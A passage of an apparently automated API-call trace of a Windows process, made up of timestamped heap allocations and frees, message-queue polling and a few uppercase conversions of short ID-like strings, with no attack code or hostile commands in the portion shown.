0x2a72a08 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0107.177] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0107.177] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0107.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0107.177] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0107.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0107.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a08 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0107.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73068 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0107.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73128 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0107.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0107.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0107.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0107.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0107.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0107.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0107.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0107.179] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0107.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0107.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0107.179] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0107.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0107.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0107.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0107.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0107.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0107.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0107.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0107.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0107.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.181] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0107.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0107.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0107.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0107.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.181] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0107.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0107.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0107.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0107.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0107.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0107.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0107.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0107.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0107.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0107.183] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0107.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0107.183] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0107.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0107.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0107.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0107.184] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0107.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0107.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74550 [0107.184] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0107.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0107.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0107.184] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0107.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0107.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0107.184] HeapFree (in: 